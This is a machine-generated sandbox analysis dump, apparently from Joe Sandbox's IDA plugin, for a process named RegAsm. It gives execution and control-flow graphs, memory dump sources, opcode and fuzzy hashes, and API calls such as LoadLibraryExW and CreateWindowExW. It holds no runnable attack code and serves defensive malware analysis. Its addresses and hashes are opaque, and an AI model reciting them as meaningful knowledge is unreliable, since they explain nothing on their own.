                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                              Total number of Nodes:134
                                                                                                                                                                              Total number of Limit Nodes:11
                                                                                                                                                                              execution_graph 40215 bcd0b8 40216 bcd0fe 40215->40216 40219 bcd298 40216->40219 40222 bcc9a0 40219->40222 40223 bcd300 DuplicateHandle 40222->40223 40224 bcd1eb 40223->40224 40225 bcad38 40229 bcae30 40225->40229 40237 bcae20 40225->40237 40226 bcad47 40230 bcae41 40229->40230 40231 bcae64 40229->40231 40230->40231 40245 bcb0b8 40230->40245 40249 bcb0c8 40230->40249 40231->40226 40232 bcae5c 40232->40231 40233 bcb068 GetModuleHandleW 40232->40233 40234 bcb095 40233->40234 40234->40226 40238 bcae4c 40237->40238 40240 bcae64 40238->40240 40243 bcb0b8 LoadLibraryExW 40238->40243 40244 bcb0c8 LoadLibraryExW 40238->40244 40239 bcae5c 40239->40240 40241 bcb068 GetModuleHandleW 40239->40241 40240->40226 40242 bcb095 40241->40242 40242->40226 40243->40239 40244->40239 40246 bcb0dc 40245->40246 40247 bcb101 40246->40247 40253 bca870 40246->40253 40247->40232 40250 bcb0dc 40249->40250 40251 bcb101 40250->40251 40252 bca870 LoadLibraryExW 40250->40252 40251->40232 40252->40251 40254 bcb2a8 LoadLibraryExW 40253->40254 40256 bcb321 40254->40256 40256->40247 40257 bc4668 40258 bc4684 40257->40258 40259 bc4696 40258->40259 40263 bc47a0 40258->40263 40268 bc3e10 40259->40268 40261 bc46b5 40264 bc47c5 40263->40264 40272 bc48b0 40264->40272 40276 bc48a1 40264->40276 40269 bc3e1b 40268->40269 40284 bc5c54 40269->40284 40271 bc6ff0 40271->40261 40274 bc48d7 40272->40274 40273 bc49b4 40273->40273 40274->40273 40280 bc4248 40274->40280 40278 bc48b0 40276->40278 40277 bc49b4 40277->40277 40278->40277 40279 bc4248 CreateActCtxA 40278->40279 40279->40277 40281 bc5940 CreateActCtxA 40280->40281 40283 bc5a03 40281->40283 40285 bc5c5f 40284->40285 40288 bc5c64 40285->40288 40287 bc709d 40287->40271 40289 bc5c6f 40288->40289 40292 bc5c94 40289->40292 40291 bc717a 40291->40287 40293 bc5c99 40292->40293 40296 bc5cc4 40293->40296 40295 bc726d 40295->40291 40298 bc5ccf 40296->40298 40297 bc8691 40297->40295 40298->40297 40300 bccdf0 40298->40300 40302 bcce11 40300->40302 40301 bcce35 40301->40297 40302->40301 40304 bccfa0 40302->40304 40305 bccfad 40304->40305 40307 bccfe7 40305->40307 40308 bcc8d8 40305->40308 40307->40301 40309 bcc8e3 40308->40309 40311 bcd8f8 40309->40311 40312 bcca04 40309->40312 40313 bcca0f 40312->40313 40314 bc5cc4 CreateWindowExW 40313->40314 40315 bcd967 40314->40315 40318 bcf6e0 40315->40318 40316 bcd9a1 40316->40311 40320 bcf711 40318->40320 40321 bcf811 40318->40321 40319 bcf71d 40319->40316 40320->40319 40322 4d30dc4 CreateWindowExW 40320->40322 40323 4d30dc8 CreateWindowExW 40320->40323 40321->40316 40322->40321 40323->40321 40324 b3d01c 40325 b3d034 40324->40325 40326 b3d08e 40325->40326 40331 4d32c17 40325->40331 40340 4d31ea8 40325->40340 40344 4d31e98 40325->40344 40348 4d30ad4 40325->40348 40334 4d32c45 40331->40334 40332 4d32c79 40373 4d30bfc 40332->40373 40334->40332 40335 4d32c69 40334->40335 40357 4d32d90 40335->40357 40362 4d32da0 40335->40362 40367 4d32e6c 40335->40367 40336 4d32c77 40341 4d31ece 40340->40341 40342 4d30ad4 CallWindowProcW 40341->40342 40343 4d31eef 40342->40343 40343->40326 40345 4d31ece 40344->40345 40346 4d30ad4 CallWindowProcW 40345->40346 40347 4d31eef 40346->40347 40347->40326 40349 4d30adf 40348->40349 40350 4d32c79 40349->40350 40352 4d32c69 40349->40352 40351 4d30bfc CallWindowProcW 40350->40351 40353 4d32c77 40351->40353 40354 4d32d90 CallWindowProcW 40352->40354 40355 4d32da0 CallWindowProcW 40352->40355 40356 4d32e6c CallWindowProcW 40352->40356 40354->40353 40355->40353 40356->40353 40359 4d32db4 40357->40359 40358 4d32e40 40358->40336 40377 4d32e58 40359->40377 40380 4d32e48 40359->40380 40364 4d32db4 40362->40364 40363 4d32e40 40363->40336 40365 4d32e58 CallWindowProcW 40364->40365 40366 4d32e48 CallWindowProcW 40364->40366 40365->40363 40366->40363 40368 4d32e2a 40367->40368 40369 4d32e7a 40367->40369 40371 4d32e58 CallWindowProcW 40368->40371 40372 4d32e48 CallWindowProcW 40368->40372 40370 4d32e40 40370->40336 40371->40370 40372->40370 40374 4d30c07 40373->40374 40375 4d3435a CallWindowProcW 40374->40375 40376 4d34309 40374->40376 40375->40376 40376->40336 40378 4d32e69 40377->40378 40383 4d342a0 40377->40383 40378->40358 40381 4d32e69 40380->40381 40382 4d342a0 CallWindowProcW 40380->40382 40381->40358 40382->40381 40384 4d30bfc CallWindowProcW 40383->40384 40385 4d342aa 40384->40385 40385->40378

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 586 6043f50-6043f84 589 6043f86-6043f8f 586->589 590 6043f92-6043fa5 586->590 589->590 591 6044215-6044219 590->591 592 6043fab-6043fae 590->592 595 604422e-6044238 591->595 596 604421b-604422b 591->596 593 6043fb0-6043fb5 592->593 594 6043fbd-6043fc9 592->594 593->594 598 6044253-6044299 594->598 599 6043fcf-6043fe1 594->599 596->595 606 60442a8-60442d0 598->606 607 604429b-60442a5 598->607 604 6043fe7-604403a 599->604 605 604414d-604415b 599->605 635 604403c-6044048 call 6043c88 604->635 636 604404a 604->636 612 60441e0-60441e2 605->612 613 6044161-604416f 605->613 629 6044425-6044443 606->629 630 60442d6-60442ef 606->630 607->606 617 60441e4-60441ea 612->617 618 60441f0-60441fc 612->618 615 6044171-6044176 613->615 616 604417e-604418a 613->616 615->616 616->598 622 6044190-60441bf 616->622 620 60441ec 617->620 621 60441ee 617->621 626 60441fe-604420f 618->626 620->618 621->618 640 60441d0-60441de 622->640 641 60441c1-60441ce 622->641 626->591 626->592 646 6044445-6044467 629->646 647 60444ae-60444b8 629->647 644 60442f5-604430b 630->644 645 6044406-604441f 630->645 642 604404c-604405c 635->642 636->642 640->591 641->640 654 6044077-6044079 642->654 655 604405e-6044075 642->655 644->645 666 6044311-604435f 644->666 645->629 645->630 667 60444b9-604450a 646->667 668 6044469-6044485 646->668 657 60440c2-60440c4 654->657 658 604407b-6044089 654->658 655->654 661 60440c6-60440d0 657->661 662 60440d2-60440e2 657->662 658->657 669 604408b-604409d 658->669 661->662 678 604411b-6044127 661->678 673 60440e4-60440f2 662->673 674 604410d-6044113 call 6044aff 662->674 712 6044361-6044387 666->712 713 6044389-60443ad 666->713 703 604450c-6044528 667->703 704 604452a-6044568 667->704 680 60444a9-60444ac 668->680 682 60440a3-60440a7 669->682 683 604409f-60440a1 669->683 689 60440f4-6044103 673->689 690 6044105-6044108 673->690 688 6044119 674->688 678->626 693 604412d-6044148 678->693 680->647 686 6044493-6044496 680->686 692 60440ad-60440bc 682->692 683->692 686->667 691 6044498-60444a8 686->691 688->678 689->678 690->591 691->680 692->657 701 6044239-604424c 692->701 693->591 701->598 703->704 712->713 724 60443df-60443f8 713->724 725 60443af-60443c6 713->725 728 6044403-6044404 724->728 729 60443fa 724->729 732 60443d2-60443dd 725->732 733 60443c8-60443cb 725->733 728->645 729->728 732->724 732->725 733->732
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $^q
                                                                                                                                                                              • API String ID: 0-388095546
                                                                                                                                                                              • Opcode ID: e6c0c39905c5c8978187da858e9d7d68e921c9c0fcb61c713b8fc42a09e4ba0f
                                                                                                                                                                              • Instruction ID: c935436f9c1e3fbe7dcc677de35e6e1b80d657dcee00bb21f124863d5055d734
                                                                                                                                                                              • Opcode Fuzzy Hash: e6c0c39905c5c8978187da858e9d7d68e921c9c0fcb61c713b8fc42a09e4ba0f
                                                                                                                                                                              • Instruction Fuzzy Hash: A7124C74B402158FCB54EF69C494A6EBBF6FF88700B158569E905EB365DB30EC42CBA0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 21193df333023c2b140c77cd8a1aa3e452cf096333708986be3d5322f72106cd
                                                                                                                                                                              • Instruction ID: 81e86717174448e78884d6ed1e4b3632bc6581b1a8d140cc7e262646cacb23ec
                                                                                                                                                                              • Opcode Fuzzy Hash: 21193df333023c2b140c77cd8a1aa3e452cf096333708986be3d5322f72106cd
                                                                                                                                                                              • Instruction Fuzzy Hash: 2EF1B170A102199FDB55EFA8D880B9EBFF2EF85300F148569E409EB251DB35ED45CB90
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 9429e5a709c1a82e199d2350168dd6eecdc41ceaa2d0c9a51c564517f31a9167
                                                                                                                                                                              • Instruction ID: 45aeba596da6eead186a43b7c6135235c42e82882b622b134de116838331f876
                                                                                                                                                                              • Opcode Fuzzy Hash: 9429e5a709c1a82e199d2350168dd6eecdc41ceaa2d0c9a51c564517f31a9167
                                                                                                                                                                              • Instruction Fuzzy Hash: 49D12734D00219CFCB28EFB4D854AADBBB2FF8A301F1085A9D50AAB254DB355996CF11
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: f9dc40be2bff31aefaf497c030a37f505e13390cbfa688e5b40e4a431d26c815
                                                                                                                                                                              • Instruction ID: c8ae4d1f68d7628c6d39fcd60b69490076921e4920c437a61e3fe7a5065625b9
                                                                                                                                                                              • Opcode Fuzzy Hash: f9dc40be2bff31aefaf497c030a37f505e13390cbfa688e5b40e4a431d26c815
                                                                                                                                                                              • Instruction Fuzzy Hash: 4DD10634E00219DFCB28EFB4D854A9DBBB2FF8A301F1085A9D50AAB254DF355996CF11
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 294 6021298-60212af 296 60212b1-60212b7 294->296 297 60212c7-60212e9 294->297 298 60212bb-60212bd 296->298 299 60212b9 296->299 302 60212ec-60212f0 297->302 298->297 299->297 303 60212f2-60212f7 302->303 304 60212f9-60212fe 302->304 305 6021304-6021307 303->305 304->305 306 60214f8-6021500 305->306 307 602130d-6021322 305->307 307->302 309 6021324 307->309 310 60213e0-6021405 309->310 311 602132b-6021350 309->311 312 6021498-60214b9 309->312 322 6021407-6021409 310->322 323 602140b-602140f 310->323 324 6021352-6021354 311->324 325 6021356-602135a 311->325 318 60214bf-60214f3 312->318 318->302 329 602146d-6021493 322->329 327 6021430-6021453 323->327 328 6021411-602142e 323->328 332 60213b8-60213db 324->332 330 602137b-602139e 325->330 331 602135c-6021379 325->331 346 6021455-602145b 327->346 347 602146b 327->347 328->329 329->302 348 60213a0-60213a6 330->348 349 60213b6 330->349 331->332 332->302 350 602145f-6021461 346->350 351 602145d 346->351 347->329 352 60213aa-60213ac 348->352 353 60213a8 348->353 349->332 350->347 351->347 352->349 353->349
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                              • API String ID: 0-3823777903
                                                                                                                                                                              • Opcode ID: fbd561367c1cc20569dc6acaca25cfd74f12cc770301cc93742d0421eb12a36d
                                                                                                                                                                              • Instruction ID: 1e16a7aa13781d97853d1dcd3dfb7e9dcf88ac3226589ad69410e74aa149eb0b
                                                                                                                                                                              • Opcode Fuzzy Hash: fbd561367c1cc20569dc6acaca25cfd74f12cc770301cc93742d0421eb12a36d
                                                                                                                                                                              • Instruction Fuzzy Hash: 5D6127747402259FD7989BA9D844A3E7BE7BF88704B108499EB068F396CF70DC45C791
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 354 6021582-6021584 355 602158e 354->355 356 6021598-60215af 355->356 357 60215b5-60215b7 356->357 358 60215b9-60215bf 357->358 359 60215cf-60215f1 357->359 360 60215c3-60215c5 358->360 361 60215c1 358->361 364 6021638-602163f 359->364 360->359 361->359 365 6021571-6021580 364->365 366 6021645-6021747 364->366 365->354 369 60215f3-60215f7 365->369 370 6021606 369->370 371 60215f9-6021604 369->371 373 602160b-602160e 370->373 371->373 373->366 376 6021610-6021614 373->376 377 6021623 376->377 378 6021616-6021621 376->378 379 6021625-6021627 377->379 378->379 381 602174a-6021789 379->381 382 602162d-6021637 379->382 388 602178b 381->388 389 602178e-60217a7 381->389 382->364 388->389 391 60217a9-60217af 389->391 392 60217bf-60217e1 389->392 393 60217b3-60217b5 391->393 394 60217b1 391->394 397 60217e4-60217e8 392->397 393->392 394->392 398 60217f1-60217f6 397->398 399 60217ea-60217ef 397->399 400 60217fc-60217ff 398->400 399->400 401 6021805-602181a 400->401 402 6021abf-6021ac7 400->402 401->397 404 602181c 401->404 405 6021823-60218d3 404->405 406 6021990-60219bd 404->406 407 6021a07-6021a2c 404->407 408 60218d8-602198b 404->408 405->397 427 60219c3-60219cd 406->427 428 6021b36-6021b73 406->428 422 6021a32-6021a36 407->422 423 6021a2e-6021a30 407->423 408->397 430 6021a57-6021a7a 422->430 431 6021a38-6021a55 422->431 429 6021a94-6021aba 423->429 433 60219d3-6021a02 427->433 434 6021b00-6021b2f 427->434 429->397 450 6021a92 430->450 451 6021a7c-6021a82 430->451 431->429 433->397 434->428 450->429 453 6021a86-6021a88 451->453 454 6021a84 451->454 453->450 454->450
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                              • API String ID: 0-2392861976
                                                                                                                                                                              • Opcode ID: 4f256ef789ed174dde853c855bf638acfa47327939c950637e918535dd65e9e4
                                                                                                                                                                              • Instruction ID: 3fac98043107b8d55ebb1d2b16bad61afa34e3cbf843bb9b4db746bcc8d6204c
                                                                                                                                                                              • Opcode Fuzzy Hash: 4f256ef789ed174dde853c855bf638acfa47327939c950637e918535dd65e9e4
                                                                                                                                                                              • Instruction Fuzzy Hash: BFC1D134B402268FDB949B68C854A3E7FF6EF89704F60849AE6068B392DF74DC45C791
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 481 6021295-60212af 484 60212b1-60212b7 481->484 485 60212c7-60212e9 481->485 486 60212bb-60212bd 484->486 487 60212b9 484->487 490 60212ec-60212f0 485->490 486->485 487->485 491 60212f2-60212f7 490->491 492 60212f9-60212fe 490->492 493 6021304-6021307 491->493 492->493 494 60214f8-6021500 493->494 495 602130d-6021322 493->495 495->490 497 6021324 495->497 498 60213e0-6021405 497->498 499 602132b-6021350 497->499 500 6021498 497->500 510 6021407-6021409 498->510 511 602140b-602140f 498->511 512 6021352-6021354 499->512 513 6021356-602135a 499->513 502 60214a2-60214b9 500->502 506 60214bf-60214f3 502->506 506->490 517 602146d-6021493 510->517 515 6021430-6021453 511->515 516 6021411-602142e 511->516 520 60213b8-60213db 512->520 518 602137b-602139e 513->518 519 602135c-6021379 513->519 534 6021455-602145b 515->534 535 602146b 515->535 516->517 517->490 536 60213a0-60213a6 518->536 537 60213b6 518->537 519->520 520->490 538 602145f-6021461 534->538 539 602145d 534->539 535->517 540 60213aa-60213ac 536->540 541 60213a8 536->541 537->520 538->535 539->535 540->537 541->537
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1985068451.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_6020000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $^q$$^q
                                                                                                                                                                              • API String ID: 0-355816377
                                                                                                                                                                              • Opcode ID: 7af5266585167f4b152dd3d32d9e221cbd897058e3237d6126c2d7e157ebcb84
                                                                                                                                                                              • Instruction ID: c9c8d9ba64945395eb3e345a3d620271176c0bcd29c7fbd5ddce392c522f53c7
                                                                                                                                                                              • Opcode Fuzzy Hash: 7af5266585167f4b152dd3d32d9e221cbd897058e3237d6126c2d7e157ebcb84
                                                                                                                                                                              • Instruction Fuzzy Hash: B34107B47402265FD7849AA8D854A3B3AEBEF89704F1184A9FB028B391CFB1DC45C791
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 736 bcae30-bcae3f 737 bcae6b-bcae6f 736->737 738 bcae41-bcae4e call bc9838 736->738 739 bcae71-bcae7b 737->739 740 bcae83-bcaec4 737->740 745 bcae64 738->745 746 bcae50 738->746 739->740 747 bcaec6-bcaece 740->747 748 bcaed1-bcaedf 740->748 745->737 793 bcae56 call bcb0b8 746->793 794 bcae56 call bcb0c8 746->794 747->748 749 bcaee1-bcaee6 748->749 750 bcaf03-bcaf05 748->750 754 bcaee8-bcaeef call bca814 749->754 755 bcaef1 749->755 753 bcaf08-bcaf0f 750->753 751 bcae5c-bcae5e 751->745 752 bcafa0-bcafb7 751->752 769 bcafb9-bcb018 752->769 757 bcaf1c-bcaf23 753->757 758 bcaf11-bcaf19 753->758 756 bcaef3-bcaf01 754->756 755->756 756->753 760 bcaf25-bcaf2d 757->760 761 bcaf30-bcaf39 call bca824 757->761 758->757 760->761 767 bcaf3b-bcaf43 761->767 768 bcaf46-bcaf4b 761->768 767->768 770 bcaf4d-bcaf54 768->770 771 bcaf69-bcaf76 768->771 787 bcb01a-bcb060 769->787 770->771 772 bcaf56-bcaf66 call bca834 call bca844 770->772 776 bcaf78-bcaf96 771->776 777 bcaf99-bcaf9f 771->777 772->771 776->777 788 bcb068-bcb093 GetModuleHandleW 787->788 789 bcb062-bcb065 787->789 790 bcb09c-bcb0b0 788->790 791 bcb095-bcb09b 788->791 789->788 791->790 793->751 794->751
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00BCB086
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1979212194.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_bc0000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                                              • Opcode ID: 587b324f54cea33aa47eb9fbe2a2acf9d2428ca06e301876bc3a1e451370ebed
                                                                                                                                                                              • Instruction ID: 70e7db4f8ac2e6ce3e5c85ae915f5aa241ba635a8ce1f273442ecfc89dfb1d7c
                                                                                                                                                                              • Opcode Fuzzy Hash: 587b324f54cea33aa47eb9fbe2a2acf9d2428ca06e301876bc3a1e451370ebed
                                                                                                                                                                              • Instruction Fuzzy Hash: EE7159B0A00B098FD724DF29D445B5ABBF1FF88708F10896DE48AD7A40D775E946CB91
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 795 4d31ce4-4d31d56 797 4d31d61-4d31d68 795->797 798 4d31d58-4d31d5e 795->798 799 4d31d73-4d31dab 797->799 800 4d31d6a-4d31d70 797->800 798->797 801 4d31db3-4d31e12 CreateWindowExW 799->801 800->799 802 4d31e14-4d31e1a 801->802 803 4d31e1b-4d31e53 801->803 802->803 807 4d31e60 803->807 808 4d31e55-4d31e58 803->808 809 4d31e61 807->809 808->807 809->809
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D31E02
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1984230763.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4d30000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 716092398-0
                                                                                                                                                                              • Opcode ID: 62917995c23ec5aad03c208307b25a296336096812878b88521d336221df74f0
                                                                                                                                                                              • Instruction ID: 73b1449c175aca1f093f511dfde6b01e2ebdbe802f56fd3d58b74b84345baa79
                                                                                                                                                                              • Opcode Fuzzy Hash: 62917995c23ec5aad03c208307b25a296336096812878b88521d336221df74f0
                                                                                                                                                                              • Instruction Fuzzy Hash: 3051C2B1D10319DFDB14CFA9C884ADEBBB5FF48310F64852AE819AB210DB71A945CF91
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 810 4d30aa8-4d31d56 812 4d31d61-4d31d68 810->812 813 4d31d58-4d31d5e 810->813 814 4d31d73-4d31e12 CreateWindowExW 812->814 815 4d31d6a-4d31d70 812->815 813->812 817 4d31e14-4d31e1a 814->817 818 4d31e1b-4d31e53 814->818 815->814 817->818 822 4d31e60 818->822 823 4d31e55-4d31e58 818->823 824 4d31e61 822->824 823->822 824->824
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D31E02
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1984230763.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4d30000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 716092398-0
                                                                                                                                                                              • Opcode ID: 10233285f8d77983b61f4e9cffefb54ee4ca2ed8fffda810e4dfb180f2c4a51e
                                                                                                                                                                              • Instruction ID: 5d552252e96a8dfae0dba7c27dd8188b1317cfe83bb23c61a962c54acb9592dc
                                                                                                                                                                              • Opcode Fuzzy Hash: 10233285f8d77983b61f4e9cffefb54ee4ca2ed8fffda810e4dfb180f2c4a51e
                                                                                                                                                                              • Instruction Fuzzy Hash: 8151C0B1D003099FDB14CFA9C984ADEBBB5FF48314F64812AE819AB210DB71A845CF91
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 825 bc5935-bc593b 826 bc5944-bc5a01 CreateActCtxA 825->826 828 bc5a0a-bc5a64 826->828 829 bc5a03-bc5a09 826->829 836 bc5a66-bc5a69 828->836 837 bc5a73-bc5a77 828->837 829->828 836->837 838 bc5a88 837->838 839 bc5a79-bc5a85 837->839 841 bc5a89 838->841 839->838 841->841
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00BC59F1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1979212194.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_bc0000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Create
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                              • Opcode ID: c96700ecc70e820bf561bb41f73ad428fc1b4b6d331c10bd214ea554dc243d99
                                                                                                                                                                              • Instruction ID: 9280f4680f63ca851072c5d75af6f6fb5637c14e4a8a20424cbf857c0c3fc662
                                                                                                                                                                              • Opcode Fuzzy Hash: c96700ecc70e820bf561bb41f73ad428fc1b4b6d331c10bd214ea554dc243d99
                                                                                                                                                                              • Instruction Fuzzy Hash: B141F2B0D00719CBDB24DFA9C884B9DBBF5FF44308F24815AD409AB251DB75698ACF50
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 842 4d30bfc-4d342fc 845 4d34302-4d34307 842->845 846 4d343ac-4d343cc call 4d30ad4 842->846 848 4d3435a-4d34392 CallWindowProcW 845->848 849 4d34309-4d34340 845->849 853 4d343cf-4d343dc 846->853 851 4d34394-4d3439a 848->851 852 4d3439b-4d343aa 848->852 855 4d34342-4d34348 849->855 856 4d34349-4d34358 849->856 851->852 852->853 855->856 856->853
                                                                                                                                                                              APIs
                                                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 04D34381
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.1984230763.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4d30000_RegAsm.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CallProcWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2714655100-0
                                                                                                                                                                              • Opcode ID: 3e76d275dbd1cc8e4f8b0df85dff0365876fdb9b332b83d16ede7197c4577d06
                                                                                                                                                                              • Instruction ID: b5a959c6279d7bb6ff7f2e87a561f839410c8b0b1c42daf677edc36e29bae904
                                                                                                                                                                              • Opcode Fuzzy Hash: 3e76d275dbd1cc8e4f8b0df85dff0365876fdb9b332b83d16ede7197c4577d06
                                                                                                                                                                              • Instruction Fuzzy Hash: 494138B8A00309DFDB14DF99C448AAABBF5FF88319F24C559D519AB321D734E845CBA0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
